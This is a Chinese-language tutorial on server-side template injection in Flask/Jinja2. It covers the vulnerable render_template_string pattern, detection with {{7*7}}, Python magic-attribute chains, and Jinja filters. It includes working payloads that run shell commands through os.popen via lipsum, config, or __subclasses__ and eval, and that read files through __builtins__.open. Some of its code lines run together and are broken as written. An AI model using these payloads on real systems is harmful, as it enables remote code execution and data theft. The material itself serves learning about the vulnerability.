SSTI模版注入（初步）

ssti可能造成任意文件读取和RCE远程控制后台系统

漏洞成因：渲染模版时，没有严格控制对用户的输入；

使用了危险的模版，导致用户可以混合flask程序进行交互。

flask是基于python开发的一种web服务器，那么也就意味着如果用户可以和flask进行交互的话，就可以执行python的代码，比如eval,system,file等等的函数

漏洞原理

from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/',methods = ['GET'])
def index():str = request.args.get('ben')html_str = '''<html><head></head><body>{{str}}</body></html>'''return render_template_string(html_str,str_str)
if __name__=='__main__':
​app.debug = Trueapp.run('127.0.0.1','8080')
#GET方式获取ben的值赋值给str
#str值通过render_template_string加载到body中间
#str是被{{}}包裹起来，会先预先渲染转义，然后才输出，不会被渲染执行(直接替换)
#只会获取str对应的字符串
#例如：127.0.0.1:8080/?ben={{5*5}}
#页面显示结果就是{{5*5}}
​
-----------------------------------------------------------------------------------------
​
from importlib,resources import contents
import time
from flask import Flask,request,render_template_string
app = Flask(__name__)
@app.route('/',methods = ['GET'])
def index():str = request.args.get('ben')html_str = '''<html><head></head><body>{{0}}</body></html>'''.format(str)return render_template_string(html_str)
if __name__=='__main__':
​app.debug = Trueapp.run('127.0.0.1','8080')
#str值通过format()函数填充到body中间
{}里可以定义任何参数
return render_template_string会把{}内的字符串当成代码指令
例如：127.0.0.1:8080/?ben={{7*7}}
{{7*7}}会被当做指令执行，页面显示结果是49

判断类型

{{7*7}}可用来检测漏洞

没有对提交的字符串进行足够严格的过滤，可能会当成代码指令执行

SSTI(Server-Side Template Injection)服务器端模版注入，实际上也是一种注入漏洞

实际上模板注入有很多种，这里主要是Python中的flask模版注入

这个图就是用来判断模版类型，第一个分支就是绿色代表的是执行即49，红色代表没有执行即{{7*7}}。

例如：

 

而mako中的是

种类有许多例如：Smarty, Mako, Jinjia2, Twig, Eval, Django, Flask, Go, Ruby, Tornado ……

魔术方法及利用模块

__class__ 查找当前类型的所有对象
__base__ 沿着父子类的关系往上走一个
__mro__  查找当前类对象的所有子类
__subclasses__() 查找父类下的所有子类
__init__ 查看类是否重载，重载是指程序在运行时就已经加载好了这个模块到内存中，如果出现wrapper的字眼，说明没有重载
__globals__ 函数会议字典的形式返回当前对象的全部全局变量

例子：
class A:pass    #这行代码定义了一个名为 A 的类。pass 是一个空语句，表示这个类没有任何属性或方法。
class B(A):pass #这行代码定义了一个名为 B 的类，它继承自类 A。这意味着 B 类将继承 A 类的所有属性和方                 法。pass 也表示这个类没有额外的属性或方法。
class C(B):pass
class D(B):pass
c= C()          #这行代码创建了 C 类的一个实例，并将其赋值给变量 c。此时，c 是一个 C 类的对象。由于 C                  继承了 B 和 A，所以 c 具有 B 和 A 中定义的所有属性和方法（虽然在这个例子中，A、B、                 C 这些类都没有定义任何属性或方法）。
​
print(c.__class__)          #<class'__main__.C'>         当前类C
print(c.__class__.__base__)   #<class'__main__.B'>      当前类C的父类B
print(c.__class__.__base__.__base__)  #<class '__main__.A'> 父类的父类
print(c.__class__.__base__.__base__.__base__)   #<class 'object'>
print(c.__class__.__mro__)   #<class'__main__.C'><class'__main__.B'><class'__main__.A'>                               <class'object'>           #罗列所有父类关系
print(c.__class__.__base__.__subclasses__())  #[<class'__main__.C'><class'__main__.D'>]#B下面的所有子类（数组形式）
print(c.__class__.__base__.__subclasses__()[1]) #<class'__main__.D'> （调用B中的D，下标从0开始）

文件读取

类

__class__            类的一个内置属性，表示实例对象的类。
​
__base__             类型对象的直接基类
​
__bases__            类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__
​
__mro__              此属性是由类组成的元组，在方法解析期间会基于它来查找基类。
​
__subclasses__()     返回这个类的子类集合，Each class keeps a list of weak references to its                      immediate subclasses. This method returns a list of all those                         references still alive. The list is in definition order.
​
__init__             初始化类，返回的类型是function__init__其实就是看你要用的这个模块是否已经提前重载好了了。
​
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所                     有变量。
​
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
​
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作                     的时候（形如：a.xxx/a.xxx()），都会自动去调用__getattribute__方法。因此我们                     同样可以直接通过这个方法来获取到实例、类、函数的属性。
​
__getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a['b']，就是a.__getitem__('b')
​
__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名                     称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与                              __builtin__的区别就不放了，百度都有。__builtins__，这里就是先加载内嵌函数，然后再读内嵌函数里面的如eval等可利用的函                     数。
​
__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__('os').popen('ls').read()
​
__str__()            返回描写这个对象的字符串，可以理解成就是打印出来。
​
url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
​
get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且                                              url_for.__globals__['__builtins__']含有current_app。
​
lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模                     块：{{lipsum.__globals__['os'].popen('ls').read()}}
​
current_app          应用上下文，一个全局变量。
-----------------------------------------------------------------------------------------
request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open         函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
​
request.args.x1      get传参
​
request.values.x1    所有参数
​
request.cookies      cookies参数
​
request.headers      请求头参数
​
request.form.x1      post传参 (Content-Type:applicaation/x-www-form-urlencoded或
​
multipart/form-data)
​
request.data         post传参 (Content-Type:a/b)
​
request.json         post传json  (Content-Type: application/json)
​
config               当前application的所有配置。此外，也可以这样{{ 
​
config.__class__.__init__.__globals__['os'].popen('ls').read() }}
​
g                    {{g}}得到<flask.g of 'flask_ssti'>
​

常见过滤器

常用的过滤器
•
int()：将值转换为int类型；
•
float()：将值转换为float类型；
•
lower()：将字符串转换为小写；
•
upper()：将字符串转换为大写；
•
title()：把值中的每个单词的首字母都转成大写；
•
capitalize()：把变量值的首字母转成大写，其余字母转小写；
•
trim()：截取字符串前面和后面的空白字符；
•
wordcount()：计算一个长字符串中单词的个数；
•
reverse()：字符串反转；
•
replace(value,old,new)： 替换将old替换为new的字符串；
•
truncate(value,length=255,killwords=False)：截取length长度的字符串；
•
striptags()：删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格；
•
escape()或e：转义字符，会将<、>等符号转义成HTML中的符号。显例：content|escape或content|e。
•
safe()： 禁用HTML转义，如果开启了全局转义，那么safe过滤器会将变量关掉转义。示例： {{'<em>hello</em>'|safe}}；
•
list()：将变量列成列表；
•
string()：将变量转换成字符串；
•
join()：将一个序列中的参数值拼接成字符串。示例看上面payload；
•
abs()：返回一个数值的绝对值；
•
first()：返回一个序列的第一个元素；
•
last()：返回一个序列的最后一个元素；
•
format(value,arags,*kwargs)：格式化字符串。比如：{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出：Helloo? - Foo!
•
length()：返回一个序列或者字典的长度；
•
sum()：返回列表内数值的和；
•
sort()：返回排序后的列表；
•
default(value,default_value,boolean=false)：如果当前变量没有值，则会使用参数中的值来代替。示例：name|default('xiaotuo')----如果name不存在，则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值，如果想使用python的形式判断是否为false，则可以传递boolean=true。也可以使用or来替换。
•
length()返回字符串的长度，别名是count
​

常见注入模块

 

payload示例：

name={{"".__class__.__base__.__subclasses__()[117].__init__.__globals__.['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
​
#这里name要根据实际的传参的字符更改
#.__base__.的数量要一直找到object为止，所以这里也是要变化的

大致思路，具体问题具体分析

1.随便找一个内置类对象用class拿到他所对应的类 (逻辑：如果自身模块没有就调用父类模块下的其他子类) 2.用bases拿到基类（<class 'object'>） 3.用subclasses()拿到子类列表 4.在子类列表中直接寻找可以利用的类getshell

对象→类→基本类→子类→init方法→globals属性→builtins属性→eval函数

注意：['eval']后面的("python代码")，一定要有read()不然不会有回显